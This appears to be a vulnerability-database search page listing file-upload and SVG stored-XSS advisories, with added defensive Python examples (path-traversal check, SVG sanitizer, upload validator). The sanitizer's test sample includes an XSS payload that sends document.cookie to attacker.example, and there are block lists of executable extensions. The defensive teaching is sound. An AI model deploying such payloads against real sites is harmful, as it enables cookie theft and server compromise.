3575 matches found

Vulnrichment
added 2025/07/25 12:00 a.m. · 5 views

CVE-2025-45893

OpenCart version 4.1.0.4 is vulnerable to a Stored Cross-Site Scripting (XSS) attack via SVG file uploads used in blog posts. The vulnerability arises because SVG files uploaded through the media manager are not properly sanitized. Attackers can craft a malicious SVG file containing embedded...

AI score 5.7 · EPSS 0.00229
Exploits 1 · References 2
CNVD
added 2025/07/25 12:00 a.m. · 4 views

WordPress Ajax Load More plugin authorization issue vulnerability

The WordPress Ajax Load More plugin is an open-source plugin used mainly for infinite scrolling and lazy loading of site content, improving the user experience through AJAX. The plugin has an authorization issue vulnerability; the vulnerability...

CVSS 8.8 · AI score 7 · EPSS 0.00951
Exploits 1 · References 1
Positive Technologies
added 2025/07/25 12:00 a.m. · 4 views

PT-2025-30924 · Tableau · Tableau Server

Affected software and versions: Tableau Server prior to 2025.1.3, prior to 2024.2.12, and prior to 2023.3.19. Description: Tableau Server contains a flaw in the Extensible Protocol Service modules that allows unrestricted fi...

CVSS 8.5 · AI score 7.3 · EPSS 0.00232
Exploits 0 · References 7
CNNVD
added 2025/07/25 12:00 a.m. · 5 views

WordPress plugin Droip code issue vulnerability

WordPress and its plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that supports running personal blog sites on servers with PHP and MySQL; Droip is a WordPress plugin. A code issue...

CVSS 8.8 · AI score 6.8 · EPSS 0.00602
Exploits 0 · References 3
CNVD
added 2025/07/25 12:00 a.m. · 2 views

Dell AppSync File Upload Vulnerability

Dell AppSync is a data replication management application from Dell. A file upload vulnerability exists in Dell AppSync version 4.6.0.0, which stems from the application's lack of effective validation of uploaded files. The vulnerability can be exploited to execute arbitrary code remotely by...

CVSS 6.6 · AI score 7.7 · EPSS 0.00402
Exploits 0 · References 1
Positive Technologies
added 2025/07/25 12:00 a.m. · 5 views

PT-2025-51681

Affected software and versions: Responsive Thumbnail Slider plugin for WordPress prior to 1.0.1. Description: The plugin is susceptible to arbitrary file uploads because of inadequate file type validation within the image uploader. Attackers with subscriber-level...

CVSS 8.8 · AI score 7.6 · EPSS 0.02016
Exploits 1 · References 8
NVD
added 2025/07/24 7:15 a.m. · 4 views

CVE-2025-7852

The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle function hooked via the 'add_new_customer' route in all versions up to, and including, 1.0.6. The plugin's image-upload handler calls move_uploaded_file on...

CVSS 9.8 · EPSS 0.01156
Exploits 1 · References 4
Cvelist
added 2025/07/24 4:24 a.m. · 7 views

CVE-2025-7437 Ebook Store <= 5.8012 - Unauthenticated Arbitrary File Upload

The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebook_store_save_form function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...

CVSS 9.8 · EPSS 0.01181
Exploits 0 · References 3
Vulnrichment
added 2025/07/24 4:24 a.m. · 3 views

CVE-2025-7437 Ebook Store <= 5.8012 - Unauthenticated Arbitrary File Upload

The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebook_store_save_form function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...

CVSS 9.8 · AI score 7.6 · EPSS 0.01181
Exploits 0 · References 3
RedhatCVE
added 2025/07/24 2:24 a.m. · 10 views

CVE-2012-10020

The FoxyPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadify.php file in versions up to, and including, 0.4.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server, which may...

CVSS 9.8 · AI score 7.5 · EPSS 0.02676
Exploits 1 · References 1
Positive Technologies
added 2025/07/24 12:00 a.m. · 3 views

PT-2025-30632 · WordPress · Ebook Store

Affected software and versions: Ebook Store plugin for WordPress prior to 5.8012. Description: The Ebook Store plugin for WordPress is susceptible to arbitrary file uploads because of a lack of file type validation within the ebook_store_save_form function. This...

CVSS 9.8 · AI score 7.4 · EPSS 0.01181
Exploits 0 · References 4
ATTACKERKB
added 2025/07/23 5:36 a.m. · 2 views

CVE-2025-54439

Unrestricted Upload of File with Dangerous Type vulnerability in Samsung Electronics MagicINFO 9 Server allows Code Injection. This issue affects MagicINFO 9 Server: less than 21.1080.0...

CVSS 8.8 · AI score 5.8 · EPSS 0.0641
Exploits 0 · References 2 · Affected Software 1
NVD
added 2025/07/22 2:15 a.m. · 7 views

CVE-2015-10137

The Website Contact Form With File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_file' function in versions up to, and including, 1.3.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the...

CVSS 9.8 · EPSS 0.0304
Exploits 1 · References 7
CVE
added 2025/07/22 1:44 a.m. · 15 views

CVE-2012-10020

CVE-2012-10020 affects the FoxyPress WordPress plugin. Up to version 0.4.2.1, it allows unauthenticated arbitrary file uploads via uploadify.php due to missing file type validation, potentially enabling remote code execution. Affected software: FoxyPress plugin for WordPress (versions ≤ 0.4.2.1)....

CVSS 9.8 · AI score 7.7 · EPSS 0.02676
Exploits 1 · References 5 · Affected Software 1
Positive Technologies
added 2025/07/22 12:00 a.m. · 4 views

PT-2025-30401

The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access an...

CVSS 5.5 · AI score 5 · EPSS 0.0027
Exploits 0 · References 4
CNNVD
added 2025/07/22 12:00 a.m. · 2 views

WordPress plugin Ajax Load More security vulnerability

The WordPress Ajax Load More plugin is an open-source plugin used mainly for infinite scrolling and lazy loading of site content, improving the user experience through AJAX. The plugin has an authorization issue vulnerability; the vulnerability...

CVSS 8.8 · AI score 6.9 · EPSS 0.00951
Exploits 1 · References 3
OSV
added 2025/07/21 3:15 p.m. · 4 views

CVE-2025-46120

An issue was discovered in CommScope Ruckus Unleashed prior to 200.15.6.212.27 and 200.18.7.1.323, and in Ruckus ZoneDirector prior to 10.5.1.0.282, where a path-traversal flaw in the web interface lets the server execute attacker-supplied EJS templates outside permitted directories, allowing a...

CVSS 9.8 · AI score 6.1 · EPSS 0.00998
Exploits 1 · References 2
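
The Ruckus entry above describes a path-traversal flaw that lets the server render EJS templates from outside the permitted directory. The containment check that prevents that class of bug, as an added Python illustration (not Ruckus code, and Python rather than the Node/EJS stack the advisory concerns): join the client-supplied name onto the template root, resolve the result, and only then test that it is still inside the root, so `..` segments, absolute paths and symlinks are all caught by one test. The directory layout, file names and template contents below are constructed for the example.

```python
import os
import tempfile
from pathlib import Path


def resolve_template(template_root: Path, requested: str) -> Path:
    """Map a client-supplied template name to a file under template_root.

    The path is resolved *after* joining, so '../' segments, absolute paths and
    symlinks pointing outside the root are all caught by one containment check.
    A string-prefix test on the unresolved path would miss the symlink case."""
    root = template_root.resolve()
    candidate = (root / requested).resolve()  # an absolute 'requested' replaces root entirely
    if candidate == root or not candidate.is_relative_to(root):
        raise PermissionError(f"{requested!r} escapes the template root")
    if candidate.suffix != ".ejs":
        raise PermissionError(f"{requested!r} is not a template")
    return candidate


def check(template_root: Path, requested: str) -> str:
    """'ok:<relative path>' or 'rejected:<reason>'; used by the demo and the tests."""
    try:
        rel = resolve_template(template_root, requested).relative_to(template_root.resolve())
        return "ok:" + rel.as_posix()
    except PermissionError as exc:
        return "rejected:" + str(exc)


def build_demo_tree() -> Path:
    """Constructed layout (not from the advisory): one real template under the root,
    a file outside it, and a symlink inside the root that points at the outside file.
    Assumes a Unix-like filesystem where os.symlink needs no special privilege."""
    base = Path(tempfile.mkdtemp())
    root = base / "templates"
    (root / "pages").mkdir(parents=True)
    (root / "pages" / "home.ejs").write_text("<h1><%= title %></h1>")
    outside = base / "outside.ejs"
    outside.write_text("<%= 'should never be rendered' %>")
    os.symlink(outside, root / "pages" / "escape.ejs")
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for req in ["pages/home.ejs", "../outside.ejs", "pages/../../outside.ejs",
                "pages/escape.ejs", "/etc/passwd", "pages"]:
        print(f"{req:24} -> {check(demo_root, req)}")
```

The symlink case is the one most hand-rolled checks miss: `root/pages/escape.ejs` starts with the root as a string, but it resolves to a file outside it, which is why the check works on the resolved path rather than on the text of the request.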
RedhatCVE
added 2025/07/21 9:06 a.m. · 13 views

CVE-2025-6997

The ThemeREX Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 2.35.1.1 due to insufficient input sanitization and output escaping. The plugin's SVG rendering routine calls the trx_addons_get_svg_from_file function on an...

CVSS 6.4 · AI score 5.8 · EPSS 0.00205
Exploits 0 · References 1
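
Three entries on this page (OpenCart CVE-2025-45893, BSK PDF Manager PT-2025-30401 and ThemeREX Addons CVE-2025-6997) are stored XSS through uploaded SVG files that are rendered without sanitization. The following is an added Python example, not code from any of those projects, of what a sanitizer has to strip from an SVG before it is rendered inline: script elements, HTML-embedding elements, event-handler attributes, and `href`/`xlink:href` values whose scheme is not safe. It works on the parsed tree rather than the raw text, so an attribute encoded as `jav&#x61;script:` is judged after the parser decodes it. The sample SVG is constructed for the example and is not a payload taken from any advisory; production code should parse with defusedxml, since xml.etree is still exposed to entity-expansion denial of service.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep <svg>, <circle> unprefixed on output
ET.register_namespace("xlink", XLINK_NS)

# Elements that can run script, embed HTML, or pull in external resources.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed", "handler", "style"}
# URL schemes permitted in href / xlink:href; "" covers fragment (#id) and relative references.
SAFE_SCHEMES = {"", "http", "https"}


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1].lower()


def _scheme(url: str) -> str:
    """Scheme of a URL with whitespace removed and after the XML parser has decoded
    entities, so 'jav&#x61;script:' and 'java\\tscript:' both come out as 'javascript'."""
    compact = "".join(url.split()).lower()
    if compact.startswith("#") or ":" not in compact:
        return ""
    return compact.split(":", 1)[0]


def sanitize_svg(svg: bytes) -> tuple:
    """Return (sanitized SVG bytes, list of removals made).

    Raises xml.etree.ElementTree.ParseError on malformed input and ValueError if the
    root element is not <svg>."""
    root = ET.fromstring(svg)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    removed = []

    def clean(elem):
        for child in list(elem):  # iterate over a copy: the tree is mutated
            if _local(child.tag) in FORBIDDEN_ELEMENTS:
                elem.remove(child)
                removed.append(f"removed <{_local(child.tag)}> element")
            else:
                clean(child)
        for attr in list(elem.attrib):
            name, value = _local(attr), elem.attrib[attr]
            if name.startswith("on"):  # onload, onclick, onmouseover, ...
                reason = "event handler"
            elif name == "href" and _scheme(value) not in SAFE_SCHEMES:
                reason = "unsafe URL scheme"
            elif name == "style" and ("url(" in value.lower() or "expression(" in value.lower()):
                reason = "external reference in style"
            else:
                continue
            del elem.attrib[attr]
            removed.append(f"removed {name} attribute on <{_local(elem.tag)}> ({reason})")

    clean(root)
    return ET.tostring(root), removed


# Constructed malicious SVG of the kind the stored-XSS advisories describe.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="jav&#x61;script:alert(1)"><text x="10" y="20">click me</text></a>
  <image href="data:text/html,&lt;script&gt;alert(2)&lt;/script&gt;" width="10" height="10"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml" onmouseover="alert(3)">x</body></foreignObject>
  <use xlink:href="#icon"/>
  <circle id="icon" cx="50" cy="50" r="40" fill="#0a0"/>
</svg>"""

if __name__ == "__main__":
    cleaned, log = sanitize_svg(MALICIOUS_SVG)
    print(cleaned.decode())
    print(*log, sep="\n")
```

Sanitizing is the second-best fix. The first is not to render user-supplied SVG inline at all: either refuse the type at upload (as the file-type allowlist in the upload example does) or serve it from a separate origin with `Content-Disposition: attachment` and a restrictive Content-Security-Policy, so that even an unsanitized file cannot run script in the site's origin.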
Positive Technologies
added 2025/07/20 12:00 a.m. · 8 views

PT-2025-30202 · Harry0703 · Moneyprinterturbo

Affected software and versions: harry0703 MoneyPrinterTurbo through 1.2.6. Description: A critical issue exists in harry0703 MoneyPrinterTurbo. The upload_bgm_file function within the File Extension Handler component, located in the app/controllers/v1/video.py file,...

CVSS 6.5 · AI score 6.3 · EPSS 0.00372
Exploits 0 · References 8
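
Most of the entries on this page share one root cause: an upload handler that trusts the client's filename and declared type and writes the file where the web server will execute it (WPBookit CVE-2025-7852, Ebook Store CVE-2025-7437, FoxyPress CVE-2012-10020, Website Contact Form With File Upload CVE-2015-10137, Responsive Thumbnail Slider PT-2025-51681, Dell AppSync, Samsung MagicINFO CVE-2025-54439 and MoneyPrinterTurbo PT-2025-30202). The following is an added Python example, not code from any of those products, showing the vulnerable pattern beside a hardened validator: an allowlist of extensions tied to expected magic bytes, rejection of executable segments anywhere in the name (so `shell.php.jpg` fails too), a content check, and a server-chosen filename. The allowlist and the sample uploads are constructed for the example.

```python
import os
import uuid

# Magic-byte prefixes for the only types this uploader may store. Constructed for
# this example; a real application would take the allowlist from its own configuration.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Extensions a web server or PHP handler may execute or render as active content.
# Every dotted segment after the first is checked, so "shell.php.jpg" is refused too.
DANGEROUS_SEGMENTS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "htaccess", "svg", "html", "htm", "js", "shtml", "cgi",
}

# Server-side code markers: a cheap defence-in-depth check against image/PHP polyglots.
SUSPICIOUS_MARKERS = (b"<?php", b"<?=", b"<script")


def vulnerable_accepts(client_name: str, client_mime: str) -> bool:
    """The pattern behind the advisories: trust the client's filename and declared
    MIME type, then hand the file to move_uploaded_file (or an equivalent). A file
    called shell.php sent with a spoofed image/png type passes this check."""
    return bool(client_name) and client_mime.startswith("image/")


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a server-chosen filename for an acceptable upload or raise ValueError.

    Neither the client filename nor the client-declared MIME type is trusted: the
    last extension must be on the allowlist, no segment may be executable, and the
    leading bytes must match the type the extension claims."""
    base = os.path.basename(client_name.replace("\\", "/"))  # drop any directory part
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[0]:
        raise ValueError("filename has no usable extension")
    ext = segments[-1]
    if ext not in ALLOWED_TYPES:
        raise ValueError(f".{ext} is not an allowed type")
    if any(seg in DANGEROUS_SEGMENTS for seg in segments[1:]):
        raise ValueError("executable extension inside filename")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise ValueError("content does not match the claimed type")
    if any(marker in data for marker in SUSPICIOUS_MARKERS):
        raise ValueError("server-side code marker found in upload")
    # Never reuse the client's name: random name plus the validated extension only.
    return f"{uuid.uuid4().hex}.{ext}"


def check_upload(client_name: str, data: bytes) -> tuple:
    """(accepted, stored_name_or_reason) wrapper used by the demo and the tests."""
    try:
        return True, validate_upload(client_name, data)
    except ValueError as exc:
        return False, str(exc)


# Constructed sample uploads; none of these come from the advisories listed above.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 12
WEBSHELL = b"<?php echo 'webshell'; ?>"
POLYGLOT = b"GIF89a" + WEBSHELL  # valid GIF magic followed by a PHP body

if __name__ == "__main__":
    for name, payload in [
        ("photo.png", PNG_HEADER),
        ("shell.php", WEBSHELL),
        ("shell.php.jpg", JPEG_HEADER),
        ("avatar.jpg", WEBSHELL),
        ("banner.gif", POLYGLOT),
        ("../../evil.png", PNG_HEADER),
    ]:
        print(f"{name:16} naive={vulnerable_accepts(name, 'image/png')!s:5} "
              f"hardened={check_upload(name, payload)}")
```

The magic-byte and marker checks are heuristics; a polyglot can carry a valid image header and still be parsed as PHP. The controls that actually stop execution are the extension allowlist, the server-chosen name, and storing uploads in a directory the web server serves without a script handler (or from a separate host). In WordPress the equivalent work is done by wp_check_filetype_and_ext and wp_handle_upload, which the affected plugins bypassed by calling move_uploaded_file directly.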
CNNVD
added 2025/07/20 12:00 a.m. · 2 views

Thinkgem JeeSite code issue vulnerability

Thinkgem JeeSite is an open-source Java EE enterprise rapid development platform from China's Joyuan Thinkgem company. The platform includes system permission, data permission, data dictionary, core tool, view manipulation, workflo...

CVSS 6.5 · AI score 6.2 · EPSS 0.00303
Exploits 1 · References 6